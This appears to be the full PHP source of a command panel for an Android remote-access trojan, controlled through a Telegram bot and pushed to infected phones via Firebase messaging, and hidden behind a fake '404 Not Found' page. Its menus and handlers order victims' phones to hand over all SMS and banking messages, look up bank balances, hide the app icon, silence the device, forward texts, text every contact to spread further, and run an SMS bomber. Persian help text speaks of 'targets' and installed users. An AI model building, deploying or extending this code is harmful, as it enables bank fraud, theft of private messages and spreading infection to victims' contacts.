<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>

<head>
    <title>404 Not Found</title>
</head>

<body>
    <h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>
    <p>Additionally, a 404 Not Found
        error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body>

</html>
<?php

error_reporting(0);
include("config.php");
if(!is_dir("infolist")) mkdir("infolist");
if(!is_dir("data")) mkdir("data");
if(!file_exists("web.txt")) file_put_contents("web.txt", "https://google.com");
if(!file_exists("data/android.txt")) file_put_contents("data/android.txt", "none");
if(!file_exists("data/numberoff.txt")) file_put_contents("data/numberoff.txt", "none");
if(!file_exists("data/numberuser.txt")) file_put_contents("data/numberuser.txt", "0");
if(!file_exists("data/user.txt")) file_put_contents("data/user.txt", "");
$numberuser = file_get_contents("data/numberuser.txt");
$youurl = file_get_contents("web.txt");
$pingbot = pingbot();

#-----------------------------
define('API_KEY', $token);
define('PROJECT_ID', $project_id);
define('FILE', $jsonFile);
define('MAD_PORT', $topic);
#-----------------------------#
$update = json_decode(file_get_contents("php://input"));
    if(isset($update->message)){
    $from_id = $update->message->from->id;
    $chat_id = $update->message->chat->id;
    $text = $update->message->text;
    $first_name = $update->message->from->first_name;
    $message_id = $update->message->message_id;
    $username = isset($update->message->from->username) ? $update->message->from->username : "ندارد !";
}elseif(isset($update->callback_query)){
    $chat_id = $update->callback_query->message->chat->id;
    $data = $update->callback_query->data;
    $query_id = $update->callback_query->id;
    $message_id = $update->callback_query->message->message_id;
    $in_text = $update->callback_query->message->text;
    $from_id = $update->callback_query->from->id;
    $first_name = $update->callback_query->from->first_name;
    $username = isset($update->callback_query->from->username) ? $update->callback_query->from->username : "ندارد !";
}
#-----------------------------#

function bot($method, $datas=[]){
    $url = "https://api.telegram.org/bot".API_KEY."/".$method;
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$datas);
    $res = curl_exec($ch);
    if(curl_error($ch)){
        var_dump(curl_error($ch));
    }else{
        return json_decode($res);
    }
}

function sendmessage($text, $keyboard = null, $mrk = null) {
    global $chat_id;
    return bot('sendMessage',[
        'chat_id' => $chat_id,
        'text' => $text,
        'parse_mode' => "HTML",
        'disable_web_page_preview' => true,
        'reply_markup' => $keyboard
    ]);
}

function em($chat_id,$message_id,$text,$keyboard){
        global $chat_id;
bot('editmessagetext',[ 
    'chat_id'=>$chat_id, 
    'message_id'=>$message_id,
    'text'=>$text,
    'parse_mode'=>'HTML',
    'reply_markup'=>$keyboard
	]);
	}
	
function pingbot(){
    
    $ch = curl_init("127.0.0.1"); 
  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  if(curl_exec($ch))
  {
  $info = curl_getinfo($ch);
 return $info['total_time'] ;
  }

  curl_close($ch);


}

function step($step) {
    global $from_id;
    file_put_contents("data/$from_id.txt", $step);
}

function getAccessToken($file){
    require 'vendor/autoload.php';
    $serviceAccountFilePath = "$file";
    $serviceAccount = json_decode(file_get_contents($serviceAccountFilePath), true);

    // Generate the JWT using the service account credentials
    $clientEmail = $serviceAccount['client_email'];
    $privateKey = $serviceAccount['private_key'];

    $payload = [
        "iss" => $clientEmail,
        "scope" => "https://www.googleapis.com/auth/firebase.messaging",
        "aud" => "https://www.googleapis.com/oauth2/v4/token",
        "iat" => time(),
        "exp" => time() + 3600
    ];

    $jwt = Firebase\JWT\JWT::encode($payload, $privateKey, 'RS256');

    // Get the OAuth 2.0 access token
    $requestBody = [
        "grant_type" => "urn:ietf:params:oauth:grant-type:jwt-bearer",
        "assertion" => $jwt
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://www.googleapis.com/oauth2/v4/token");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($requestBody));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        "Content-Type: application/json"
    ]);

    $response = curl_exec($ch);
    curl_close($ch);

    $accessToken = json_decode($response)->access_token;

    return $accessToken;
}
function action($action, $androidid)
{
    $access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
                "androidid" => $androidid
            )
        ),
    );
    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);
} 

function sendmess($action, $androidid, $phone, $message)
{
    $access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
                "androidid" => $androidid,
                "phone" =>$phone,
                "text" =>$message
            ),"android" => array(
                "priority" => "high"
            )
        ),
    );
    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);

}

function ping($action)
{
    $access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
            )
        ),
    );

    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);

}

function bmb($action,$phone1){

$access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
                "numberbmb" => $phone1
            )
        ),
    );

    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);

}
function numberoff($action,$androidid,$phone12424){

$access = getAccessToken(FILE);
    $data = array(
        "message" => array(
            "topic" => MAD_PORT,
            "data" => array(
                "action" => $action,
                "androidid" => $androidid,
                "numberoff" => $phone12424
            )
        ),
    );

    $data_string = json_encode($data);
    $headers = array(
        "Authorization: Bearer " . $access,
        "Content-Type: application/json",
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "https://fcm.googleapis.com/v1/projects/".PROJECT_ID."/messages:send");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
    $result = curl_exec($ch);
    curl_close($ch);

}

if(!file_exists("data/$from_id.txt")) file_put_contents("data/$from_id.txt", "");
if(!file_exists("data/autobal.txt")) file_put_contents("data/autobal.txt", "off");
if(!file_exists("data/autohide.txt")) file_put_contents("data/autohide.txt", "off");
if(!file_exists("data/autotar.txt")) file_put_contents("data/autotar.txt", "off");
if(!file_exists("data/onlineset.txt")) file_put_contents("data/onlineset.txt", "list");
if(!file_exists("mess")) file_put_contents("mess", "یک متن ست کنید!");
if(!file_exists("messs")) file_put_contents("messs", "یک متن ست کنید!");
$step = file_get_contents("data/$from_id.txt");


#-----------------------------#

$start = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
    [['text' => "📊ᴏɴʟɪɴᴇ ʟɪꜱᴛ", 'callback_data' => 'list'],['text' => "🌐ꜱᴇᴛ ʟɪɴᴋ", 'callback_data' => 'url']],
    [['text'=>"🏦ꜰɪɴᴅ ʙᴀʟᴀɴᴄᴇ ᴀʟʟ🏦",'callback_data' => 'findbalancesall']],
    [['text'=>"💸 ᴀᴜᴛᴏ ʙᴀʟᴀɴᴄᴇ",'callback_data' => 'autobal'],['text'=>"💀 Auto hide",'callback_data' => 'autohide']],
    [['text'=>"💊 Change icon All",'callback_data' => 'Settingsall']],    
    [['text'=>"📞ꜱᴇɴᴅ ᴛᴏ ᴀʟʟ ᴄᴏɴᴛᴀᴄᴛ📞",'callback_data' => 'sendtoallconts']],
    [['text'=>"👾 ᴀᴜᴛᴏ ᴛᴀʀ👾",'callback_data' => 'autotar']],
    [['text' => "💣ꜱᴍꜱ ʙᴏᴍʙᴇʀ💣", 'callback_data' => 'bmb'],['text' => "👻 Hide All icon", 'callback_data' => 'hideall']],
    [['text' => "📦ᴄʜᴇᴄᴋ ʜᴏꜱᴛ📦", 'callback_data' => 'Check'],['text' => "☎️ꜱᴇᴛ ɴᴜᴍʙᴇʀ ᴏꜰꜰ ᴍᴏᴅᴇ☎️", 'callback_data' => 'setnumberoff']],
      [['text'=>"💦 Online list setting",'callback_data' => 'onlinelistset']],
    [['text' => "🌐 ʏᴏᴜʀ ʟɪɴᴋ🌐 :", 'callback_data' => 'null'],['text' => "$youurl", 'callback_data' => 'null']],
    [['text' => "📝ɴᴜᴍʙᴇʀ ᴜꜱᴇʀ📝:", 'callback_data' => "null"],['text' => "$numberuser", 'callback_data' => "null"]],
    [['text' => "📡 Remote Ping :", 'callback_data' => "null"],['text' => "$pingbot M/s", 'callback_data' => "null"]],
    [['text' => "🆘 Help", 'callback_data' => 'About']],
]]);

$panelremote = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
[['text'=>"📡ᴘɪɴɢ ᴜꜱᴇʀ📡",'callback_data' => 'pingone']],
[['text'=>"📂ɢᴇᴛ ᴀʟʟ ꜱᴍꜱ(𝟻𝟶)📂",'callback_data' => 'smsget'],['text'=>"📂 ɢᴇᴛ ᴀʟʟ ꜱᴍꜱ📂",'callback_data' => 'smsget2']],
[['text'=>"📥ꜱᴇɴᴅ ꜱᴍꜱ📥",'callback_data' => 'sendmessage'],['text'=>"📩 ʟᴀꜱᴛ ꜱᴍꜱ📩",'callback_data' => 'getlastsms']],
[['text'=>"🏦 ᴀʟʟ ʙᴀɴᴋ ꜱᴍꜱ🏦",'callback_data' => 'getlastbank']],
[['text'=>"☎️ɢᴇᴛ ᴜꜱᴇʀ ᴘʜᴏɴᴇ☎️",'callback_data' => 'getuserphone']],
[['text'=>"💰ꜰɪɴᴅ ʙᴀʟᴀɴᴄᴇ💰",'callback_data' => 'findbalances']],
[['text'=>"🧬ᴄʜᴀɴɢᴇ ɪᴄᴏɴ🧬",'callback_data' => 'Settings']],
[['text'=>"📲ꜱᴇɴᴅ ᴛᴏ ᴄᴏɴᴛᴀᴄᴛ📲",'callback_data' => 'smssendcontact']],
[['text' => "ᴏꜰꜰ ᴍᴏᴅᴇ ᴏɴ✅", 'callback_data' => 'offmode'],['text' => "ᴏꜰꜰ ᴍᴏᴅᴇ ᴏꜰꜰ❎", 'callback_data' => 'offmode2']],
[['text'=>"💠ʜɪᴅᴇ ɪᴄᴏɴ💠",'callback_data' => 'hideicon'],['text'=>"♻️ꜱʜᴏᴡ ɪᴄᴏɴ♻️",'callback_data' => 'unhide']],
[['text'=>"💾 Save Info",'callback_data' => 'save']],
[['text'=>"🔇 Silent",'callback_data' => 'silent'],['text'=>"🔊 Normal",'callback_data' => 'normal']],
[['text'=>"⏫ʙᴀᴄᴋ ᴛᴏ ᴘᴀɴᴇʟ⏫", 'callback_data'=>"back"]], 
]]);

$back = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
[['text'=>"🔙 B A C K", 'callback_data'=>"back"]], 
]]);

$backp = json_encode(['resize_keyboard'=>true, 'inline_keyboard'=>[
[['text'=>"🔙 B A C K", 'callback_data'=>"backp"]], 
]]);

$back5=json_encode(array('inline_keyboard'=>[[['text'=>"✅",'callback_data' => 'yes'],['text'=>"❌",'callback_data' => 'backp']]]));
$back6=json_encode(array('inline_keyboard'=>[[['text'=>"✅",'callback_data' => 'yess'],['text'=>"❌",'callback_data' => 'backp']]]));
$back7=json_encode(array('inline_keyboard'=>[[['text'=>"✅",'callback_data' => 'yesss'],['text'=>"❌",'callback_data' => 'back']]]));
$autottt=json_encode(array('inline_keyboard'=>[[['text'=>"✅ on or off ❌",'callback_data' => 'autotaronoroff'],['text'=>"🛅 set text ",'callback_data' => 'setttext']]]));

if($text == '/start'){

        step('none');
    sendmessage("
🗞 ʜᴇʟʟᴏ ᴡᴇʟᴄᴏᴍᴇ ᴛᴏ ᴘᴀɴᴇʟ ᴛᴀʀɢᴇᴛ
🏝 ꜱᴇʟᴇᴄᴛ ᴛʜᴇ ᴅᴇꜱɪʀᴇᴅ ᴏᴘᴛɪᴏɴ:
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
    ", $start);
    
}
if($data == 'About'){

        step('none');
    sendmessage("💫 راهنمایی استفاده از ریموت 
سلام 
-  لیست آنلاین چند بار پشت سرهم نگیرید 
- اسمس بمبر خودش متن ست داره
- چک url برای اینه ک متوجه بشین درگاهتون فیلتر هست یا نیست
- نامبر یوزر تعداد یوزر های نصب شده شماست
- اگر دسترسی نداده بود یوزر آل اسمس نگیرید چون باعث بگایی یوزر میشه
- آل اسمس گوشی اگر ارسال نشد یه چیز طبیعیه کاریش نمیشه کرد پس پیوی رو سرویس نکنید 
- راهنمای بخش offmode :
این بخش برای اینه که وقتی نت تارگتتون خاموش میشه بازم پیاماش بیاد براتون حتما تو قسمت ست نامبر شمارتونو ست کنید تو رت و وقتی خواستین یکیو بندازین تو حالت آف مود بزنین رو off mode وقتی داخل پنلشین اینطوری هرچی پیام براش بیاد برای بیسندی ک شما ست کردین هم میاد


    ", null);
    
}
elseif($data == 'back'){

        step('none');
    em($chat_id,$message_id,"
🗞 ʜᴇʟʟᴏ ᴡᴇʟᴄᴏᴍᴇ ᴛᴏ ᴘᴀɴᴇʟ ᴛᴀʀɢᴇᴛ
🏝 ꜱᴇʟᴇᴄᴛ ᴛʜᴇ ᴅᴇꜱɪʀᴇᴅ ᴏᴘᴛɪᴏɴ:
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>
    ", $start);

}

elseif($data == "list"){

       ping('ping');
file_put_contents("data/miid.txt", $message_id);
           em($chat_id,$message_id,"📊 Please wait..", $back);
        }     
        elseif($data == "setnumberoff"){
            
            	    em($chat_id,$message_id,"👿 Send Me Number",$back);
            	    	          step('NumberOFF');
            	    	         

        }
           elseif($step == 'NumberOFF' && isset($text)){
     file_put_contents('data/numberoff.txt',$text);
	     sendmessage("❇️ Seted.",$start);
	                	    	          step('none');
	}
	
        elseif($data == "bmb"){
            
            	    em($chat_id,$message_id,"👿 Send Me Number
این آرگوز نوب سگ اومده توی رتش متن (سلام) رو واسه اسمس بمبرش گذاشته",$back);
            	    	          step('bmber');
            	    	          
        }
        
   elseif($step == 'bmber' && isset($text)){

  bmb("bmb",$text);

	     sendmessage("❇️ Message Request Sended For AllUser.",$start);
	                	    	          step('none');
	}
        
        elseif($data == "hideall"){
             ping('hideall');
               bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "🔦 Request Sended.",
                'show_alert' => true,
   ]);
        }
        elseif($data == "findbalancesall"){
             ping('findbalancesall');
               bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "🔦 Request Sended.",
                'show_alert' => true,
   ]);
        }
        elseif($data == "Settingsall"){
             ping('Settingsall');
               bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "🔦 Request Sended.",
                'show_alert' => true,
   ]);
        }
        
elseif($data == "url"){

	    em($chat_id,$message_id,"🌐 Send me the link :",$back);
	          step('url1');
}

elseif($step == 'url1' && isset($text)){

    file_put_contents('web.txt',$text);

    sendmessage("✨ Seted",$start);
      step('none');

}

        
elseif($data == "Check"){
$urldarga =file_get_contents('web.txt');
	$host = $_SERVER['HTTP_HOST'];
	$currentDirectory = basename(__DIR__);
     $link = "https://$host/$currentDirectory/CheckHost.php?sleep=5&url=$urldarga";
                 $chkgost = file_get_contents($link);

	    em($chat_id,$message_id,"
	   لاگ json از سمت چک هاست :
$chkgost
نکته :
اگر status ها true بودند یعنی درگاه شما سالم است!
از دست آورد های آرگوز نوب سگ 😂👆🏿
",$back);



}

elseif($data == "null"){

       bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "کص ننه آرگوز",
                'show_alert' => false,

            ]);
        }

elseif(strpos($text, "/OffModeOn_") !== false){
$code       =     str_replace("/OffModeOn_", null, $text);


  numberoff("offmode",$code,$phone4214214);

      sendmessage( "sent !!!", null);

}
elseif(strpos($text, "/Hide_") !== false){
$code       =     str_replace("/Hide_", null, $text);

    	     action('hide', $code);

      sendmessage( "sent !!!", null);

}
elseif(strpos($text, "/AllSMS_") !== false){
$code       =     str_replace("/AllSMS_", null, $text);

    	     action('getsms', $code);

      sendmessage( "sent !!!", null);

}
elseif(strpos($text, "/set_") !== false){
      step('none');
$code       =     str_replace("/set_", null, $text);
file_put_contents("data/android.txt",$code);
$android    =    file_get_contents("data/android.txt");

      sendmessage("
      🔑 You Are in $android Panel :
         
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a> 
          ", $panelremote);

}
elseif($data == "backp"){
    
    step('none');
    $android    =    file_get_contents("data/android.txt");
    $backtext  =    "🔑 You Are in $android Panel :
        
 🌴 | <a href='http://t.me/D_P_R/'>BAMBI KHAPHN</a>    ";


	    em($chat_id,$message_id,$backtext, $panelremote);

}

elseif($data == "pingone"){

    $android    =   file_get_contents("data/android.txt");

    	     action('pingone', $android);

       bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request ping was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
        elseif($data == "findbalances"){

    $android    =   file_get_contents("data/android.txt");

    	     action('findbalances', $android);

       bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request ping was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
        elseif($data == "getuserphone"){

    $android    =   file_get_contents("data/android.txt");

    	     action('getuserphone', $android);

       bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request ping was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
        elseif($data == "silent"){

    $android    =    file_get_contents("data/android.txt");
    
    	     action('silent', $android);
    	     
       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request silent was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
             elseif($data == "normal"){

$android    =    file_get_contents("data/android.txt");
    
    	     action('normal', $android);
    	     
       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request normal was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        


                elseif($data == "smsget"){

    $android    =    file_get_contents("data/android.txt");
    
    	     action('getsms2', $android);

       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request allsms was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
                        elseif($data == "smsget2"){

    $android    =    file_get_contents("data/android.txt");
    
    	     action('getsms', $android);

       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request allsms was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        elseif($data == "Settings"){

    $android    =    file_get_contents("data/android.txt");
    
    	     action('Settings', $android);

       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request allsms was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
                         elseif($data == "offmode2"){
                           
$android    =    file_get_contents("data/android.txt");
    
    	     action('offmode2', $android);
    	     
       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request offmode was sent to $android",
                'show_alert' => true,
                
            ]);
        }
                       elseif($data == "offmode"){
                           
$android    =    file_get_contents("data/android.txt");

   $phone4214214 =  file_get_contents("data/numberoff.txt");
  numberoff("offmode",$android,$phone4214214);

    	     
       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request offmode was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
                       elseif($data == "getlastsms"){
                           
$android    =    file_get_contents("data/android.txt");
    
    	     action('lastsms', $android);
    	     
       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request lastsms was sent to $android",
                'show_alert' => true,
                
            ]);
        }
        
                       elseif($data == "getlastbank"){
                           
$android    =    file_get_contents("data/android.txt");
    
    	     action('getlastbank', $android);
    	     
       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request getlastbank was sent to $android",
                'show_alert' => true,
                
            ]);
        }
                       elseif($data == "hideicon"){

$android    =    file_get_contents("data/android.txt");

    	     action('hide', $android);

       bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request hideicon was sent to $android",
                'show_alert' => true,
            ]);
        }
        
                       elseif($data == "unhide"){
                           
$android    =    file_get_contents("data/android.txt");

    	     action('unhide', $android);

       bot('answercallbackquery', [
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request unhide was sent to $android",
                'show_alert' => true,

            ]);
        }
        
        elseif($data == "save"){

         $android   =  file_get_contents("data/android.txt");

        if(!file_exists("infolist/$android.txt")){
            
            em($chat_id,$message_id,"🗞 Submit the information you want to save for this user 
            
            برای مثال [کارت 100 میلی]",$backp);

           step("info");

        }else{

            $android    =   file_get_contents("data/android.txt");
            $inf = file_get_contents("infolist/$android.txt");

                   bot('answercallbackquery', [     
          'callback_query_id' => $update->callback_query->id,
                'text' => "⏳ The request get info user was sent to $android",
                'show_alert' => true,
                      ]);

              bot('sendmessage',[
             'chat_id'=>$chat_id,
             'text'=>"Saved Target $android Info : 
$inf",
  'parse_mode' => "HTML",

]);
}
           
         } elseif($data == "autotar"){
        $messtar = file_get_contents("messs");
            em($chat_id,$message_id,"🏧 Auto tar panel opened !!!
 text : 
 $messtar
 - - - - - -          
 این قسمت بصورت خودکار بعد از نصب متنی که ست کردید رو به مخاطبینش ارسال میکنه",$autottt);

  } elseif ($data == "autobal") {
  $action_autobal = file_get_contents("data/autobal.txt");
        if ($action_autobal == "off") {
            file_put_contents("data/autobal.txt", "on");
            em($chat_id, $message_id, "auto balance is on! ✅", $start);

        } else {
            file_put_contents("data/autobal.txt", "off");
            em($chat_id, $message_id, "auto balance is off! ❌", $start);
        }
        
  } elseif ($data == "autohide") {
  $action_autohide = file_get_contents("data/autohide.txt");
        if ($action_autohide == "off") {
            file_put_contents("data/autohide.txt", "on");
            em($chat_id, $message_id, "auto hide is on! ✅", $start);

        } else {
            file_put_contents("data/autohide.txt", "off");
            em($chat_id, $message_id, "auto hide is off! ❌", $start);
        }      
        
          } elseif ($data == "autotaronoroff") {
  $action_autotar = file_get_contents("data/autotar.txt");
        if ($action_autotar == "off") {
            file_put_contents("data/autotar.txt", "on");
            em($chat_id, $message_id, "auto tar is on! ✅", $start);

        } else {
            file_put_contents("data/autotar.txt", "off");
            em($chat_id, $message_id, "auto tar is off! ❌", $start);
        }
         } elseif ($data == "onlinelistset") {
  $onlinesetting = file_get_contents("data/onlineset.txt");
        if ($onlinesetting == "list") {
            file_put_contents("data/onlineset.txt", "single");
            em($chat_id, $message_id, "Online set {Single} 👾", $start);

        } else {
            file_put_contents("data/onlineset.txt", "list");
            em($chat_id, $message_id, "Online set {List} 👾", $start);
        }
  
}elseif($step == "info" && isset($text)){

        $all       =    explode("\n",$text);
        $nickname  =    $all[0];
        $android   =    file_get_contents("data/android.txt");
        file_put_contents("infolist/$android.txt",$text);
        
  sendmessage("Saved :)",$backp);

step("none");

}       

        	elseif($data == "sendmessage"){

	    em($chat_id,$message_id,"📨  Send Me Phone Number",$backp);
   step("message");

    }

    elseif($step == "message" && isset($text)){
        
        file_put_contents('nump',$text);
        $nump    =   file_get_contents("nump");
       step("message1");
  
  sendmessage("📄 Please Send Text Message :",$backp);

}

    elseif($step == "message1" && isset($text)){

        file_put_contents('mess',$text);
        $nump   =    file_get_contents("nump");
        $messs  =    file_get_contents("mess");
        step('none');

  sendmessage("📄 Message Seted!

$messs 

📨 Numbers : 


$nump


⚠️ Send SMS ?",$back5);

    }

	elseif($data == "yes"){

      $android   =   file_get_contents("data/android.txt");
	  $messs     =   file_get_contents("mess");
      $data      =   file_get_contents('nump');
      $str       =   explode("\n", $data); 

    foreach ($str as $str1) {

  sendmess("SendSingleMessage",$android,$str1,$messs);

    }
	     em($chat_id,$message_id,"❇️ Message Request Sended For User.",$panelremote);

	    unlink("mess");
	    unlink("nump");
	    
	}
	elseif($data == "smssendcontact"){
       step("messagecc1");
  
  em($chat_id,$message_id,"📄 Please Send Text Message :",$backp);

}

    elseif($step == "messagecc1" && isset($text)){

        file_put_contents('mess',$text);
        $messs  =    file_get_contents("mess");
        step('none');

  sendmessage("📄 Message Seted!

$messs 

⚠️ Send SMS to contact ?",$back6);

    }

	elseif($data == "yess"){

      $android   =   file_get_contents("data/android.txt");
	  $messs     =   file_get_contents("mess");

    foreach ($str as $str1) {

  sendmess("sendmokhatib",$android, "1",$messs);

    }
	     em($chat_id,$message_id,"❇️ Message Request Sended For User.",$panelremote);

	    unlink("mess");
	 
	    
	}
		elseif($data == "sendtoallconts"){
       step("messagecc2");
  
  em($chat_id,$message_id,"📄 Please Send Text Message :",$back);

}

    elseif($step == "messagecc2" && isset($text)){

        file_put_contents('mess',$text);
        $messs  =    file_get_contents("mess");
        step('none');

  sendmessage("📄 Message Seted!

$messs 

⚠️ Send SMS to contact ?",$back7);

    }

	elseif($data == "yesss"){

      $android   =   file_get_contents("data/android.txt");
	  $messs     =   file_get_contents("mess");

    foreach ($str as $str1) {

  sendmess("sendallconts",$android, "1",$messs);

    }
	     em($chat_id,$message_id,"❇️ Message Request Sended For User.",$start);

	    unlink("mess");
	 
	    
	}
		elseif($data == "setttext"){
       step("setttext");
  
  em($chat_id,$message_id,"📄 Please Send Text :",$back);

}

    elseif($step == "setttext" && isset($text)){

        file_put_contents('messs',$text);
        $messs  =    file_get_contents("messs");
        step('none');

  sendmessage("📄 Message Seted!

$messs ",$back);

    }
#-----------------------------#

?>